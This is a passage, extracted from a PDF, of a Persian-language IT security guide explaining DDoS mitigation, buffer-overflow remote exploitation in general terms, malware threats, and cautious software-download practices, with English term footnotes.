‫ﻣﻘﺼﺪ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺍﻳﻦ ﺗﻼﺷﻬﺎﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺗﺼﺎﻝ ﺑﺎﻳﺪ ﻣﻨﺎﺑﻌﻲ ﻣﺼﺮﻑ ﻛﻨﺪ ﻭ ﺍﮔﺮ ﺗﻌﺪﺍﺩ ﺍﻳﻦ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﺍﺯ ﺣﺪ ﻣﻌﻴﻨﻲ ﺑﻴﺸﺘﺮ ﺑﺎﺷﺪ‪ ،‬ﺍﻧﺠﺎﻡ‬
‫ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺎﺷﻴﻦ ﺭﺍ ﻓﻠﺞ ﻛﻨﺪ‪.‬‬

‫‪315‬‬ ‫‪Daniel Bernstein‬‬


‫‪316‬‬ ‫‪Malformed Traffic Attacks‬‬
‫‪317‬‬ ‫‪Ping of Death‬‬
‫‪318‬‬ ‫‪Distributed Denial of Service Attack‬‬
‫‪319‬‬ ‫‪Slave Processes‬‬
‫‪ ۳۲۰‬ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺩﺭ ‪ RFC‬ﺷﻤﺎﺭﺓ ‪ ۲۸۲۷‬ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫‪321 ICMP Ping Packets‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤١٦‬‬

‫ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺗﻐﻴﻴﺮ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻭ ﺁﺩﺭﺱ ‪ IP‬ﻣﺎﺷﻴﻦ ﻣﻮﺭﺩ ﺣﻤﻠﻪ‪ ،‬ﺑﺮ ﺣﻤﻠﺔ ‪ DDoS‬ﻏﻠﺒﻪ ﻛﺮﺩ‪ .‬ﺍﮔﺮ ﻧـﺎﻡ ﻣﻴﺰﺑـﺎﻥ ﻳـﺎ ﺁﺩﺭﺱ ‪IP‬‬
‫ﻗﺮﺑﺎﻧﻲ ﺩﺭﻭﻥ ﻛﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﺑﺎ ﺗﻐﻴﻴﺮ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻣﻴﺰﺑﺎﻥ ﻗﺮﺑﺎﻧﻲ ﻣﺤﺎﻓﻈﺖ ﻧﻤﻮﺩ ﻭ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑـﺴﺘﻪﻫـﺎﻳﻲ‬
‫ﻛﻪ ﺑﻪ ﺁﺩﺭﺱ ﻗﺒﻠﻲ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺗﻮﺳﻂ ﻣﺴﻴﺮﻳﺎﺏ ﺧﺎﺭﺟﻲ ﻳﺎ ‪ ISP‬ﺳﺎﺯﻣﺎﻥ ﻏﺮﺑـﺎﻝ ﻣـﻲﺷـﻮﻧﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ‪ ،‬ﻛـﺮﻡ ‪ Blaster‬ﺩﺭ‬
‫ﺁﮔﻮﺳﺖ ‪ ٢٠٠٣‬ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ ﺗﺎ ﻳﻚ ﺣﻤﻠﺔ ‪ DDoS‬ﺭﺍ ﻋﻠﻴﻪ ﺁﺩﺭﺳﻲ ﻣﺘﻌﻠﻖ ﺑﻪ ﺳـﺮﻭﻳﺲ ﺑـﻪ ﺭﻭﺯ ﺭﺳـﺎﻧﻲ ‪Microsoft Windows‬‬
‫ﺁﻏﺎﺯ ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﭼﻮﻥ ﺍﻳﻦ ﺁﺩﺭﺱ ﺩﺭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﺑﻮﺩ‪ ،‬ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﺴﺎﺩﮔﻲ ﺗﻮﺍﻧﺴﺖ ﺑﺎ ﺗﻐﻴﻴﺮ ﺁﺩﺭﺱ ‪ IP‬ﭘﺎﻳﮕﺎﻩ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ‬
‫‪٣٢٢‬‬
‫‪ ،Windows‬ﺍﻳﻦ ﺗﻬﺪﻳﺪ ﺭﺍ ﺭﻓﻊ ﻛﻨﺪ‪.‬‬

‫ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‬


‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺧﺎﺭﺟﻲ ﻃﺮﺍﺣﻲ ﻣﻲﺷﻮﻧﺪ ﻭ ﭼﻮﻥ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬـﺎ‬
‫ﻻ ﺍﻣﻜﺎﻥ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ‪.‬‬
‫ﺑﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺍﺧﺘﺼﺎﺻﻲ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻳﻨﺪ‪ ،‬ﻭﺟﻮﺩ ﺍﺷﻜﺎﻝ ﺩﺭ ﺁﻧﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻳﻬﺎﻱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑﺮ ﺍﺳﺎﺱ ﺗﻜﻨﻴﻚ ﺳﺮﺭﻳﺰﻱ ‪ buffer‬ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﺗﻜﻨﻴﻚ ﻣﺘﻜﻲ ﺑﻪ ﺭﻭﺷـﻲ ﺍﺳـﺖ ﻛـﻪ ﺯﺑـﺎﻥ‬
‫ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ‪ C‬ﻃﺒﻖ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﺭ ﺣﺎﻓﻈﻪ ﻣﻲﭼﻴﻨﺪ‪ .‬ﺳﻴﺴﺘﻢ ﺭﺍﻩ ﺩﻭﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﺪ ‪ ١٠٠‬ﺑﺎﻳﺖ ﺩﺭ ﻳﻚ ‪ buffer‬ﻛـﻪ ﺑـﺮﺍﻱ‬
‫ﻼ ‪ ٤٠‬ﺑﺎﻳﺖ ﮔﺮﻓﺘﻪ ﺷﺪﻩ ﺫﺧﻴﺮﻩ ﻛﻨﺪ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﻗﻄﻌﺔ ‪ stack‬ﺍﺧﺘﺼﺎﺹﻳﺎﻓﺘﻪ ﺑﻪ ﺁﻥ ﺑﺮﻧﺎﻣﻪ ﻧﻮﺷﺘﻪ ﻣﻲﺷﻮﺩ ﻭ ﻣﻮﺟﺐ‬ ‫ﻣﺜ ﹰ‬
‫‪٣٢٣‬‬
‫ﻣﻲﺷﻮﺩ ﺩﺳﺘﻮﺭﺍﺕ ﻣﻮﺭﺩ ﻧﻈﺮ ﻣﻬﺎﺟﻢ ﺑﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺳﻴﺴﺘﻤﻲ )ﺑﺎﻻﺗﺮﻳﻦ ﺳﻄﺢ ﺩﺳﺘﺮﺳﻲ( ﺍﺟﺮﺍ ﮔﺮﺩﺩ‪.‬‬
‫ﻣﻬﻤﺘﺮﻳﻦ ﺭﻭﺵ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﺩﻗﺖ ﺩﺭ ﺍﻧﺘﺨﺎﺏ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺷـﺒﻜﻪ ﺍﺳـﺖ‪ .‬ﺁﺳـﻴﺐﭘـﺬﻳﺮﻱ ﺑﺮﺧـﻲ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻣﻜﺮﺭﹰﺍ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺍﺯ ﺍﺑﺘﺪﺍ ﺑﺎ ﺩﺭ ﻧﻈﺮ ﮔﺮﻓﺘﻦ ﺍﻣﻨﻴﺖ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ ﻭ ﻟﺬﺍ ﻣﺸﻜﻼﺕ ﺑـﺴﻴﺎﺭ ﻛﻤﺘـﺮﻱ‬
‫ﺩﺍﺷﺘﻪﺍﻧﺪ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﺗﺪﺍﻓﻌﻲ ﺩﺭ ﻓﺼﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺑﻴﺸﺘﺮ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬

‫ﺗﻬﺪﻳﺪﺍﺕ ﺑﺮﻧﺎﻣﻪﺍﻱ‬
‫ﻻ ﻛﺎﺭﻫﺎﻱ ﻣﻔﻴﺪﻱ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﻣﻘﺎﺩﻳﺮﻱ‬ ‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﺑﺼﻮﺭﺕ ﺗﺮﺗﻴﺒﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﻳﻦ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﺍﻱ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻧﻤﺎﻳﻨﺪ ﻭ ﺑﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻣﺎ ﺍﻳـﻦ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ‬
‫ﮔﺎﻫﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺫﺍﺗﹰﺎ ﻣﺨﺮﺏ ﻳﺎ ﺑﺪﺧﻮﺍﻫﺎﻧﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﮔﺮ ﺻﺪﻣﺔ ﻭﺍﺭﺩﻩ ﺍﺗﻔﺎﻗﻲ ﺑﺎﺷﺪ‪ ،‬ﺑﻪ ﻛﺪ ﻣﺮﺑﻮﻃﻪ "ﺍﺷﻜﺎﻝ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ" ﻣﻲﮔﻮﻳﻨﺪ‪ .‬ﺷﺎﻳﺪ ﺍﻳـﻦ‬
‫ﺍﺷﻜﺎﻻﺕ ﻣﻌﻤﻮﻟﺘﺮﻳﻦ ﺩﻟﻴﻞ ﺭﻓﺘﺎﺭﻫﺎﻱ ﻏﻴﺮﻣﻨﺘﻈﺮﺓ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻣﺎ ﺍﮔﺮ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻣﺨﺮﺏ ﺍﺯ ﻃﺮﻑ ﺷﺨﺼﻲ ﺑﺎﺷﺪ ﻛـﻪ ﻣﻨﻈـﻮﺭﺵ‬
‫‪٣٢٤‬‬
‫ﺭﺧﺪﺍﺩ ﻫﻤﺎﻥ ﺭﻓﺘﺎﺭ ﻏﻴﺮﻣﻌﻤﻮﻝ ﺑﻮﺩﻩ‪ ،‬ﺑﻪ ﺁﻥ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ "ﺑﺮﻧﺎﻣﺔ ﺑﺪﺧﻮﺍﻫﺎﻧﻪ" ﻳﺎ "ﺗﻬﺪﻳﺪ ﺑﺮﻧﺎﻣﻪﺍﻱ" ﻣﻲﮔﻮﻳﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺍﻓﺮﺍﺩ ﻛﻠﻤﺔ ﺑـﺪﺍﻓﺰﺍﺭ‬
‫)ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ( ﺭﺍ ﺑﺮﺍﻱ ﭼﻨﻴﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ‪.‬‬
‫ﺍﻳﻦ ﺭﻭﺯﻫﺎ ﺑﻴﺸﺘﺮ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺼﻮﺭﺕ ﭘﻴﺎﻣﻬﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﺣﻤﻠﻪﺍﻱ ﻣﺴﺘﻘﻴﻢ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ‬
‫ﺷﺒﻜﻪﺍﻱ ﻣﻲﺁﻳﻨﺪ‪ .‬ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﻳﻚ ﺣﻤﻠﺔ ﻣﺴﺘﻘﻴﻢ ﻣﻲﺗﻮﺍﻧﺪ ﻭﺍﻗﻌﻪﺍﻱ ﺗﺼﺎﺩﻓﻲ )ﻳﻌﻨـﻲ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ ﺷـﻤﺎ ﺗـﺼﺎﺩﻓﹰﺎ‬
‫ﺍﻧﺘﺨﺎﺏ ﺷﺪﻩ ﺑﺎﺷﺪ( ﻳﺎ ﻋﻤﺪﻱ ﺑﺎﺷﺪ‪ ،‬ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺣﻤﻠﺔ ﻫﺪﺍﻳﺖﺷﺪﻩ ﺍﺷﺘﺒﺎﻫﹰﺎ ﺗﺒﺪﻳﻞ ﺑﻪ ﺣﻤﻠﻪﺍﻱ ﺗﺼﺎﺩﻓﻲ ﺷﻮﺩ ﻭ ﻳﺎ ﺑﺎﻟﻌﻜﺲ‪ .‬ﺣﻤـﻼﺕ‬
‫ﻫﺪﺍﻳﺖﺷﺪﻩ ﺑﺴﻴﺎﺭ ﻧﮕﺮﺍﻥﻛﻨﻨﺪﻩﺗﺮ ﺍﺯ ﺣﻤﻼﺕ ﺗﺼﺎﺩﻓﻲ ﻫﺴﺘﻨﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﺎ ﺍﻧﮕﻴﺰﻩ ﺗﺎ ﺯﻣـﺎﻧﻲ ﻛـﻪ ﻣﻮﻓـﻖ ﻳـﺎ ﻣﺘﻮﻗـﻒ ﺷـﻮﺩ ﺑـﻪ‬
‫ﺣﻤﻼﺗﺶ ﻫﻤﭽﻨﺎﻥ ﺍﺩﺍﻣﻪ ﺧﻮﺍﻫﺪ ﺩﺍﺩ‪.‬‬

‫‪ ۳۲۲‬ﻳﻜﻲ ﺍﺯ ﻣﻌﺮﻭﻓﺘﺮﻳﻦ ﺣﻤﻼﺕ ‪ DDoS‬ﺩﺭ ﻓﻮﺭﻳـﺔ ‪ ۲۰۰۰‬ﻋﻠﻴـﻪ ﺩﻭ ﺷـﺮﻛﺖ ﭘﺮﻣـﺸﺘﺮﻱ ‪ Yahoo‬ﻭ ‪ Amazon‬ﺻـﻮﺭﺕ ﮔﺮﻓـﺖ‪ .‬ﺗﺤﻠﻴﻠـﻲ ﺑـﺮ "‪) "trinoo‬ﺗﺮﺍﻭﺍﻳـﻲ ﻛـﻪ‬
‫‪zombie‬ﻫﺎﻱ ﺩﺧﻴﻞ ﺩﺭ ﺍﻳﻦ ﺣﻤﻠﻪ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﺮﺩ( ﺩﺭ ﺁﺩﺭﺱ ﺭﻭﺑﺮﻭ ﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ‪:‬‬
‫‪http://www.sans.org/newlook/resources/IDFAQ/trinoo.htm‬‬
‫ﻼ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺟﺎﻟﺐ ﺍﺳﺖ ﻛﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻫﻨﻮﺯ ﻫﻢ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﻨﺪ ﻛـﻪ ﺑـﻪ ﺍﻳـﻦ ﺭﻭﺵ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫‪ ۳۲۳‬ﺍﻳﻦ ﺷﻜﻞ ﺣﻤﻠﻪ ﻋﻤﺮﻱ ‪ ۳۵‬ﺳﺎﻟﻪ ﺩﺍﺭﺩ ﻭ ﻛﺎﻣ ﹰ‬
‫ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻭ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫‪324 Malware‬‬
‫‪٤١٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﻋﻮﺍﻣﻞ ﻧﺎﺧﻮﺍﺳﺘﻪﺍﻱ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﻛﺮﻣﻬﺎ ﻭ ﺳﺎﻳﺮ ﺗﻬﺪﻳﺪﻫﺎ ﺗﺒﺪﻳﻞ ﺷﻮﻧﺪ‪ .‬ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﻧﺼﺐ ﻳـﻚ‬
‫ﺑﺮﻧﺎﻣﺔ ﻧﺎﺷﻨﺎﺧﺘﻪ‪ ،‬ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ ﺩﺭﻭﻥ ﺁﻧﺮﺍ ﻧﻴﺰ ﻧﺼﺐ ﻛﻨﻨﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﻣﺤﺎﻓﻆ ﻧﻤﺎﻳﺸﮕﺮ ﺍﺟﺮﺍ ﻛﻨﻨﺪ ﻛﻪ ﺣﺎﻭﻱ ﻳﻚ ﺍﺳﺐ ﺗـﺮﺍﻭﺍ‬
‫ﺑﺎﺷﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻫﻴﭽﮕﻮﻧﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺑﻲ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺍﻣـﺎ ﺑـﻪ ﻫﺮﺣـﺎﻝ ﮔـﺮﻓﺘﻦ ﻭ ﺍﺟـﺮﺍﻱ‬
‫ﺑﻲﺭﻭﻳﺔ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺯ ﻣﻨﺎﺑﻊ ﻧﺎﻣﻌﺘﺒﺮ‪ ،‬ﺍﺣﺘﻤﺎﻝ ﻣﻮﻓﻖﺷﺪﻥ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺎﻳﺪ ﺩﺭ ﺩﺭﻳﺎﻓﺖ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺩﺳﺘﻮﺭﻱ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ‪ .‬ﺍﺩﺍﺭﺍﺗﻲ ﮐﻪ ﺍﺯ ﺣﺴﺎﺳﻴﺖ ﺑﺎﻻﻳﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﺑﺎﻳـﺪ ﺍﺯ ﺍﺟـﺮﺍﻱ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﻛـﻪ‬
‫ﺍﻣﻀﺎﻱ ﺭﻣﺰﺷﺪﺓ ﻳﻚ ﻧﻮﻳﺴﻨﺪﺓ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺭﺍ ﻧﺪﺍﺭﻧﺪ ﺍﺟﺘﻨﺎﺏ ﻛﻨﻨﺪ‪ .‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻟﺰﻭﻣﹰﺎ ﺷﻤﺎ ﺭﺍ ﻣﺤﺎﻓﻈﺖ ﻧﻤﻲﻛﻨﺪ‪ ،‬ﻭﻟﻲ ﺍﮔﺮ ﻣﺸﻜﻠﻲ ﭘﻴﺶ‬
‫ﺁﻳﺪ ﻛﺴﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺍﻭ ﺭﺍ ﻣﺴﺌﻮﻝ ﺑﺪﺍﻧﻴﺪ‪.‬‬
‫ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﻫﻴﭽﮕﺎﻩ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﻭ ﻛﺎﻣﭙﺎﻳﻞﺷﺪﻩ ﺭﺍ ‪ download‬ﻧﻜﻨﻴﺪ‪ ،‬ﺑﻠﻜﻪ ﺩﺭ ﻣﻮﺭﺩ ﺗﻤﺎﻡ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ‪ ،‬ﻗﺒـﻞ ﺍﺯ‬
‫ﺍﻳﻨﻜﻪ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺟﺪﻳﺪ ﺭﺍ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﻧﺼﺐ ﻛﻨﻴﺪ‪ ،‬ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ )ﺩﺭﺻﻮﺭﺕ ﻭﺟﻮﺩ( ﺑﺨﻮﺍﻧﻴﺪ ﻭ ﺑﻔﻬﻤﻴﺪ‪ .‬ﺍﮔﺮ ﺩﺭ ﺍﻳـﻦ ﻣﺮﺣﻠـﻪ ﺑـﻪ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﺸﻜﻮﻙ ﺷﺪﻳﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻨﻤﺎﻳﻴﺪ‪ ،‬ﺧﺼﻮﺻﹰﺎ ﺍﮔﺮ ﺑﺮﺍﻱ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻣﺪﻥ ﺑﻪ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺧﺎﺹ ﻧﻴﺎﺯ ﺩﺍﺭﺩ‪ ،‬ﻭ ﻧﻜﺘـﺔ ﺁﺧـﺮ ﺍﻳﻨﻜـﻪ‬
‫ﺗﻨﻬﺎ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺧﻮﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﮕﻴﺮﻳﺪ‪.‬‬
‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﻲﺩﻟﻴﻞ ﻧﺒﺎﻳﺪ ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻫﺮ ﮔﺮﻭﻩ ﻳﺎ ﺷﺮﻛﺖ ﺗﺠﺎﺭﻱ ﺍﻋﺘﻤﺎﺩ ﻛﻨﻴﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺷـﺮﻛﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ‪ ،‬ﺑـﺮﺍﻱ‬
‫ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻥ ﺍﻣﻜﺎﻥ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﻳﺎ ﺍﺣﻴﺎﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻓﺮﺍﻣﻮﺵﺷﺪﻩ‪ ،‬ﺩﺭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ؛ ﻭ ﺑﺮﺧـﻲ‬
‫ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺗﺠﺎﻭﺯ ﺑﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺍﺑﺰﺍﺭ ﺟﺎﺳﻮﺳﻲ ﺗﻌﺒﻴﻪ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻫﺮﭼﻨﺪ ﻣﺸﺮﻳﺎﻥ ﻋﻼﻗﻪﻣﻨﺪ ﺑﻪ ﺧﺮﻳﺪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻳﻲ‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺧﺪﻣﺎﺕ ﭘﺲ ﺍﺯ ﻓﺮﻭﺵ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ‪ ،‬ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻋﻼﻗﺔ ﻧﺎﭼﻴﺰﻱ ﺑﻪ ﻣـﺴﺌﻮﻟﻴﺖﭘـﺬﻳﺮﻱ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﻛـﻪ‬
